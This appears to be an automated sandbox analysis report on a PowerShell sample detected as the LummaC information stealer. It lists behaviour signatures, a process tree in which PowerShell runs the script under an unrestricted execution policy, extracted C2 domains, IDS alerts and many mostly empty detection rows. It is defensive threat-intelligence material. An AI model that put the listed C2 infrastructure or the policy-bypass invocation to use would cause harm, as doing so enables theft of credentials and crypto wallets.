Edit tour
Windows
Analysis Report
62.122.184.98 (3).ps1
Overview
General Information
| Sample name: | 62.122.184.98 (3).ps1 |
| Analysis ID: | 1591131 |
| MD5: | 2b60655a425eaa036531f18e96741444 |
| SHA1: | ffa85842df96dac9f6dac782cb1081251eaac749 |
| SHA256: | 930a09e6ee090e9f2b67e1a37270b4c31e3cb4fdad55cd8db34b11519759f145 |
| Tags: | 62-122-184-98ps1user-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Classification
- System is w10x64
powershell.exe (PID: 7364 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\62. 122.184.98 (3).ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 7372 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
RegSvcs.exe (PID: 7896 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - RegSvcs.exe (PID: 7904 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) - RegSvcs.exe (PID: 7912 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["nuttyshopr.biz", "truculengisau.biz", "punishzement.biz", "marketlumpe.biz", "spookycappy.biz", "fraggielek.biz", "grandiouseziu.biz", "littlenotii.biz"], "Build id": "DUkgLv--PISYA"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source: | Author: frack113: | ||
| Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:10.624646+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
| 2025-01-14T18:01:12.372040+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:13.594418+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:14.833090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49728 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:16.415374+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49737 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:17.485915+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49745 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:18.529051+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:19.821171+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:23.192598+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:13.123944+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:14.083227+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| 2025-01-14T18:01:23.963228+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.10 | 49782 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:13.123944+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.10 | 49711 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:14.083227+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.877880+0100 | 2059133 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 64828 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.890771+0100 | 2059135 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57637 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.868069+0100 | 2059137 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54196 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.903271+0100 | 2059141 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57333 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.914056+0100 | 2059143 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 54253 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.924697+0100 | 2059145 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 57389 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.936322+0100 | 2059151 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 62955 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:09.947255+0100 | 2059153 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 64010 | 1.1.1.1 | 53 | UDP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:18.991769+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.10 | 49751 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:19.827392+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.10 | 49761 | 188.114.97.3 | 443 | TCP |
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-14T18:01:11.784193+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.10 | 49704 | 104.102.49.254 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Avira URL Cloud: | ||
| Source: | Malware Configuration Extractor: | ||
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | String decryptor: | ||
| Source: | Code function: | 10_2_00414E18 | |
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 10_2_0040BA1B | |
| Source: | Code function: | 10_2_0043FB02 | |
| Source: | Code function: | 10_2_00420B20 | |
| Source: | Code function: | 10_2_00427B30 | |
| Source: | Code function: | 10_2_0043E560 | |
| Source: | Code function: | 10_2_0043B500 | |
| Source: | Code function: | 10_2_0043B500 | |
| Source: | Code function: | 10_2_00414E18 | |
| Source: | Code function: | 10_2_0040AEC0 | |
| Source: | Code function: | 10_2_00441EC0 | |
| Source: | Code function: | 10_2_00441EC0 | |
| Source: | Code function: | 10_2_004097E0 | |
| Source: | Code function: | 10_2_004097E0 | |
| Source: | Code function: | 10_2_004097E0 | |
| Source: | Code function: | 10_2_00425870 | |
| Source: | Code function: | 10_2_00419000 | |
| Source: | Code function: | 10_2_0042E815 | |
| Source: | Code function: | 10_2_0041A0E0 | |
| Source: | Code function: | 10_2_0041A0E0 | |
| Source: | Code function: | 10_2_0042D8F5 | |
| Source: | Code function: | 10_2_0042D8F5 | |
| Source: | Code function: | 10_2_0042D890 | |
| Source: | Code function: | 10_2_004298A0 | |
| Source: | Code function: | 10_2_0043C0A0 | |
| Source: | Code function: | 10_2_0042F0BD | |
| Source: | Code function: | 10_2_00441940 | |
| Source: | Code function: | 10_2_0042D859 | |
| Source: | Code function: | 10_2_0042E961 | |
| Source: | Code function: | 10_2_0042E96A | |
| Source: | Code function: | 10_2_0044011F | |
| Source: | Code function: | 10_2_0042F12D | |
| Source: | Code function: | 10_2_0042F1D9 | |
| Source: | Code function: | 10_2_0042E25A | |
| Source: | Code function: | 10_2_00416258 | |
| Source: | Code function: | 10_2_0043B210 | |
| Source: | Code function: | 10_2_00416A39 | |
| Source: | Code function: | 10_2_0042CAD0 | |
| Source: | Code function: | 10_2_0043EAD0 | |
| Source: | Code function: | 10_2_004412D0 | |
| Source: | Code function: | 10_2_004412D0 | |
| Source: | Code function: | 10_2_004412D0 | |
| Source: | Code function: | 10_2_004412D0 | |
| Source: | Code function: | 10_2_0042D2E0 | |
| Source: | Code function: | 10_2_0042D2E0 | |
| Source: | Code function: | 10_2_00428AF7 | |
| Source: | Code function: | 10_2_00421A80 | |
| Source: | Code function: | 10_2_00421A80 | |
| Source: | Code function: | 10_2_00417AB2 | |
| Source: | Code function: | 10_2_0043EB40 | |
| Source: | Code function: | 10_2_00442320 | |
| Source: | Code function: | 10_2_004413C0 | |
| Source: | Code function: | 10_2_004413C0 | |
| Source: | Code function: | 10_2_004413C0 | |
| Source: | Code function: | 10_2_0042B3D0 | |
| Source: | Code function: | 10_2_004413D7 | |
| Source: | Code function: | 10_2_004413D7 | |
| Source: | Code function: | 10_2_004413D7 | |
| Source: | Code function: | 10_2_004413D9 | |
| Source: | Code function: | 10_2_004413D9 | |
| Source: | Code function: | 10_2_004413D9 | |
| Source: | Code function: | 10_2_00409390 | |
| Source: | Code function: | 10_2_00424C50 | |
| Source: | Code function: | 10_2_0040A416 | |
| Source: | Code function: | 10_2_004414C0 | |
| Source: | Code function: | 10_2_004414C0 | |
| Source: | Code function: | 10_2_004414C0 | |
| Source: | Code function: | 10_2_00429CD0 | |
| Source: | Code function: | 10_2_0043C480 | |
| Source: | Code function: | 10_2_00413C90 | |
| Source: | Code function: | 10_2_00413C90 | |
| Source: | Code function: | 10_2_00429CB7 | |
| Source: | Code function: | 10_2_00421550 | |
| Source: | Code function: | 10_2_00414559 | |
| Source: | Code function: | 10_2_00441560 | |
| Source: | Code function: | 10_2_00441560 | |
| Source: | Code function: | 10_2_00441560 | |
| Source: | Code function: | 10_2_00420534 | |
| Source: | Code function: | 10_2_0042F5CA | |
| Source: | Code function: | 10_2_0041ADE2 | |
| Source: | Code function: | 10_2_0041ADE2 | |
| Source: | Code function: | 10_2_0043FDE4 | |
| Source: | Code function: | 10_2_0043FDE4 | |
| Source: | Code function: | 10_2_004075F0 | |
| Source: | Code function: | 10_2_004075F0 | |
| Source: | Code function: | 10_2_004415F0 | |
| Source: | Code function: | 10_2_004415F0 | |
| Source: | Code function: | 10_2_004415F0 | |
| Source: | Code function: | 10_2_00427E50 | |
| Source: | Code function: | 10_2_00438600 | |
| Source: | Code function: | 10_2_0041C620 | |
| Source: | Code function: | 10_2_00427E30 | |
| Source: | Code function: | 10_2_00427E30 | |
| Source: | Code function: | 10_2_0041E750 | |
| Source: | Code function: | 10_2_0043CF68 | |
| Source: | Code function: | 10_2_0040BF73 | |
| Source: | Code function: | 10_2_00414710 | |
| Source: | Code function: | 10_2_0043E7C0 | |
| Source: | Code function: | 10_2_0041A7C6 | |
Networking | |
|---|
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | URLs: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | JA3 fingerprint: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | Suricata IDS: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | UDP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | DNS traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | String found in binary or memory: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | HTTPS traffic detected: | ||
| Source: | Code function: | 10_2_00436170 | |
| Source: | Code function: | 10_2_00436170 | |
| Source: | Code function: | 10_2_004368B6 | |
| Source: | Window created: | Jump to behavior | ||
| Source: | Code function: | 1_2_00007FF7C0FD514A | |
| Source: | Code function: | 1_2_00007FF7C0FD5198 | |
| Source: | Code function: | 1_2_00007FF7C0FDA619 | |
| Source: | Code function: | 1_2_00007FF7C0FDA5D9 | |
| Source: | Code function: | 1_2_00007FF7C10A0FA4 | |
| Source: | Code function: | 1_2_00007FF7C10A1648 | |
| Source: | Code function: | 10_2_00408860 | |
| Source: | Code function: | 10_2_00442900 | |
| Source: | Code function: | 10_2_0040BB50 | |
| Source: | Code function: | 10_2_00427B30 | |
| Source: | Code function: | 10_2_00410409 | |
| Source: | Code function: | 10_2_0043B500 | |
| Source: | Code function: | 10_2_0042E5CA | |
| Source: | Code function: | 10_2_00420DF0 | |
| Source: | Code function: | 10_2_00424D94 | |
| Source: | Code function: | 10_2_00414E18 | |
| Source: | Code function: | 10_2_0040AEC0 | |
| Source: | Code function: | 10_2_004097E0 | |
| Source: | Code function: | 10_2_00441FA0 | |
| Source: | Code function: | 10_2_00425870 | |
| Source: | Code function: | 10_2_00419000 | |
| Source: | Code function: | 10_2_00406820 | |
| Source: | Code function: | 10_2_0042003A | |
| Source: | Code function: | 10_2_0042889D | |
| Source: | Code function: | 10_2_0043C0A0 | |
| Source: | Code function: | 10_2_0042F0BD | |
| Source: | Code function: | 10_2_00403960 | |
| Source: | Code function: | 10_2_0041C960 | |
| Source: | Code function: | 10_2_00429161 | |
| Source: | Code function: | 10_2_00429968 | |
| Source: | Code function: | 10_2_0043997F | |
| Source: | Code function: | 10_2_0042F12D | |
| Source: | Code function: | 10_2_0042F1D9 | |
| Source: | Code function: | 10_2_0040A9F0 | |
| Source: | Code function: | 10_2_004119B0 | |
| Source: | Code function: | 10_2_0040EA60 | |
| Source: | Code function: | 10_2_0042EA61 | |
| Source: | Code function: | 10_2_00435268 | |
| Source: | Code function: | 10_2_00415A2F | |
| Source: | Code function: | 10_2_00416A39 | |
| Source: | Code function: | 10_2_004172C8 | |
| Source: | Code function: | 10_2_0041EAD0 | |
| Source: | Code function: | 10_2_0042CAD0 | |
| Source: | Code function: | 10_2_004412D0 | |
| Source: | Code function: | 10_2_0042D2E0 | |
| Source: | Code function: | 10_2_00428AF7 | |
| Source: | Code function: | 10_2_00421A80 | |
| Source: | Code function: | 10_2_00440A81 | |
| Source: | Code function: | 10_2_00417AB2 | |
| Source: | Code function: | 10_2_00418ABC | |
| Source: | Code function: | 10_2_0043EB40 | |
| Source: | Code function: | 10_2_0040CB50 | |
| Source: | Code function: | 10_2_00402B70 | |
| Source: | Code function: | 10_2_0042E370 | |
| Source: | Code function: | 10_2_0043AB70 | |
| Source: | Code function: | 10_2_00432B7F | |
| Source: | Code function: | 10_2_00404310 | |
| Source: | Code function: | 10_2_00433320 | |
| Source: | Code function: | 10_2_00442320 | |
| Source: | Code function: | 10_2_00405B30 | |
| Source: | Code function: | 10_2_00419B30 | |
| Source: | Code function: | 10_2_004413C0 | |
| Source: | Code function: | 10_2_004273D0 | |
| Source: | Code function: | 10_2_004413D7 | |
| Source: | Code function: | 10_2_004413D9 | |
| Source: | Code function: | 10_2_004393F6 | |
| Source: | Code function: | 10_2_00406390 | |
| Source: | Code function: | 10_2_0040B620 | |
| Source: | Code function: | 10_2_00425470 | |
| Source: | Code function: | 10_2_0042FC10 | |
| Source: | Code function: | 10_2_0041D4C0 | |
| Source: | Code function: | 10_2_004414C0 | |
| Source: | Code function: | 10_2_00415A2F | |
| Source: | Code function: | 10_2_00413C90 | |
| Source: | Code function: | 10_2_00435C90 | |
| Source: | Code function: | 10_2_00408CA0 | |
| Source: | Code function: | 10_2_00441CB0 | |
| Source: | Code function: | 10_2_00429CB7 | |
| Source: | Code function: | 10_2_00421550 | |
| Source: | Code function: | 10_2_00441560 | |
| Source: | Code function: | 10_2_00415D66 | |
| Source: | Code function: | 10_2_0041B570 | |
| Source: | Code function: | 10_2_00420534 | |
| Source: | Code function: | 10_2_0043ADD0 | |
| Source: | Code function: | 10_2_0043C5E0 | |
| Source: | Code function: | 10_2_0041ADE2 | |
| Source: | Code function: | 10_2_0042ADEB | |
| Source: | Code function: | 10_2_004075F0 | |
| Source: | Code function: | 10_2_004415F0 | |
| Source: | Code function: | 10_2_00427E50 | |
| Source: | Code function: | 10_2_00429E61 | |
| Source: | Code function: | 10_2_00434E0E | |
| Source: | Code function: | 10_2_00442610 | |
| Source: | Code function: | 10_2_0040B620 | |
| Source: | Code function: | 10_2_0041C620 | |
| Source: | Code function: | 10_2_00419E20 | |
| Source: | Code function: | 10_2_00404E30 | |
| Source: | Code function: | 10_2_00427E30 | |
| Source: | Code function: | 10_2_0040F6C0 | |
| Source: | Code function: | 10_2_0041CEE0 | |
| Source: | Code function: | 10_2_00411685 | |
| Source: | Code function: | 10_2_004336B0 | |
| Source: | Code function: | 10_2_00402F40 | |
| Source: | Code function: | 10_2_00410F7A | |
| Source: | Code function: | 10_2_00414710 | |
| Source: | Code function: | 10_2_00425710 | |
| Source: | Code function: | 10_2_00431FCA | |
| Source: | Code function: | 10_2_00405FF0 | |
| Source: | Code function: | 10_2_00439F86 | |
| Source: | Code function: | 10_2_00423F8C | |
| Source: | Classification label: | ||
| Source: | Code function: | 10_2_0043B500 | |
| Source: | Mutant created: | ||
| Source: | Mutant created: | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File read: | Jump to behavior | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | ReversingLabs: | ||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | |||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Process created: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | Section loaded: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | Binary string: | ||
| Source: | Code function: | 1_2_00007FF7C0FD4C0D | |
| Source: | Code function: | 1_2_00007FF7C0FD5411 | |
| Source: | Code function: | 10_2_00448876 | |
| Source: | Code function: | 10_2_004412A1 | |
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
